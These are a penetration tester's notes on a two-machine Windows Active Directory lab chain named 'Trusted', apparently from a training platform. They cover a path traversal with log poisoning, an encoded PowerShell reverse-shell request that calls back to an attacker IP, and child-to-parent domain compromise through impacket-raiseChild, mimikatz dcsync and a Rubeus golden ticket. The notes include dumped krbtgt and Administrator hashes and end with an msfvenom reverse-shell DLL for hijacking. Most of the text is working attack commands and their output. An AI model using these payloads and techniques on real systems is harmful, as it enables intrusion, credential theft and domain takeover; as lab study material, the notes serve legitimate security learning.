Trusted (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Windows

Chain: True (2 Machines)

Credentials

Username	Password	Method	Scope
root	SuperSecureMySQLPassw0rd1337.	Exfiltration file	Internal Database on 10.10.222.118

✅ Valid Usernames

root

🔑 Passwords list

SuperSecureMySQLPassw0rd1337.

Information Gathering

nmap -p- -A --open -T5 -Pn -n -oN ext_trusted_tcp_allports -vvv --min-rate 3000 10.10.222.117-118

10.10.222.117

53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 13:31:12Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
464/tcp   open  kpasswd5?     syn-ack
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack Microsoft Windows RPC
49678/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
51583/tcp open  msrpc         syn-ack Microsoft Windows RPC
52197/tcp open  msrpc         syn-ack Microsoft Windows RPC
64160/tcp open  msrpc         syn-ack Microsoft Windows RPC

10.10.222.118

53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 13:31:11Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3306/tcp  open  mysql         syn-ack MySQL 5.5.5-10.4.24-MariaDB
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack Microsoft Windows RPC
49687/tcp open  msrpc         syn-ack Microsoft Windows RPC
51961/tcp open  msrpc         syn-ack Microsoft Windows RPC
57796/tcp open  msrpc         syn-ack Microsoft Windows RPC
60330/tcp open  msrpc         syn-ack Microsoft Windows RPC

Service enumeration

10.10.90.117

SMB (enum4linux-ng)

• LDAP/s: timed out

• SMB: time out

DNS

• Not vulnerable to AXFR

10.10.90.118

SMB (enum4linux-ng)

• LDAP/s: timed out

• SMB: time out

DNS

• Not vulnerable to AXFR

HTTP

Initial Foothold

Discovering File Path Traversal

Path: http://10.10.222.118/dev/index.html?view=../../../../../../../../../../../../../../xampp/apache/logs/access.log

Poisoning the User-Agent header.

Poison the logs

Verifying the Success of the attack

Exploiting to obtain a reverse shell.

GET /dev/index.html?view=../../../../../../../../../../../../../../xampp/apache/logs/access.log&cmd=powershell+-e+JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADUALgA0ADgAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA HTTP/1.1

Host: 10.10.222.118

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9,es;q=0.8

Cookie: PHPSESSID=jljs9h2k5vaj3sl6kf21alo2ns

Connection: keep-alive

Compromise parent domain

During the enumeration the tester discovered that the domains has a Bidirectional Trust.

PS C:\xampp\htdocs\dev> Get-ADTrust -Filter *


Direction               : BiDirectional
DisallowTransivity      : False
DistinguishedName       : CN=trusted.vl,CN=System,DC=lab,DC=trusted,DC=vl
ForestTransitive        : False
IntraForest             : True
IsTreeParent            : False
IsTreeRoot              : False
Name                    : trusted.vl
ObjectClass             : trustedDomain
ObjectGUID              : c8005918-3c50-4c33-bcaa-90c76f46561c
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source                  : DC=lab,DC=trusted,DC=vl
Target                  : trusted.vl

Automatic ExtraSids Attack

❯ impacket-raiseChild lab.trusted.vl/Administrator -hashes :75878369ad33f35b7070ca854100bc07 2>/dev/null

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 


[*] Raising child domain lab.trusted.vl
[*] Forest FQDN is: trusted.vl
[*] Raising lab.trusted.vl to trusted.vl
[*] trusted.vl Enterprise Admin SID is: S-1-5-21-3576695518-347000760-3731839591-519
[*] Getting credentials for lab.trusted.vl
lab.trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:c930ddb15c3f84aafa01e816abc1112e38430b574ae3fcdd019e77bc906494aa
[*] Getting credentials for trusted.vl
trusted.vl/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9436aebee2db5c6e4166d5e2472fa2d:::
trusted.vl/krbtgt:aes256-cts-hmac-sha1-96s:3e5bc8a7d01388cdaf4ab8541f4e360d4fd9089723cedfd08f8016b7900ba2bf
[*] Target User account name is Administrator
trusted.vl/Administrator:500:aad3b435b51404eeaad3b435b51404ee:15db914be1e6a896e7692f608a9d72ef:::
trusted.vl/Administrator:aes256-cts-hmac-sha1-96s:d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6

Manual ExtraSids Attack

Extracting krbtgt's NTLM

PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /domain:lab.trusted.vl /user:LAB\krbtgt /patch" exit
** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 9/14/2022 6:43:59 PM
Object Security ID   : S-1-5-21-2241985869-2159962460-1278545866-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: c7a03c565c68c6fac5f8913fab576ebd

Extracting Current Domain SID

PS C:\Temp> Get-DomainSID
S-1-5-21-2241985869-2159962460-1278545866

Extracting Enterprise Admins SID Group

PS C:\Temp> Get-ADGroup -Identity "Enterprise Admins" -Server trusted.vl


DistinguishedName : CN=Enterprise Admins,CN=Users,DC=trusted,DC=vl
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : 9e72548e-1fda-486c-b426-6bcb7f171253
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3576695518-347000760-3731839591-519

Crafting Golden Ticket

PS C:\Temp> .\Rubeus.exe golden /rc4:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /user:Administrator /ptt

Performing DCSync Attack against trusted.vl

PS C:\Temp> .\mimikatz.exe privilege::debug "lsadump::dcsync /domain:trusted.vl /dc:TRUSTEDDC.trusted.vl /user:TRUSTED\Administrator /patch" exit
** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 1/1/1601 12:00:00 AM
Password last change : 9/18/2022 8:50:53 PM
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db914be1e6a896e7692f608a9d72ef
<SNIF>

Privilege escalation on labdc via DLL Hijacking

During enumeration, the tester found a custom binary named KasperskyRemovalTool.exe in C:\AVTest. Upon analysis, it was discovered that when the binary is executed, it attempts to load KasperskyRemovalToolENU.dll from the current directory. Since the DLL is not present, this behavior leads to a DLL hijacking opportunity.

To exploit this vulnerability:

1. Create a malicious DLL

2. Transfer the DLL to C:\AVTest

3. Execute the binary

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll > KasperskyRemovalToolENU.dll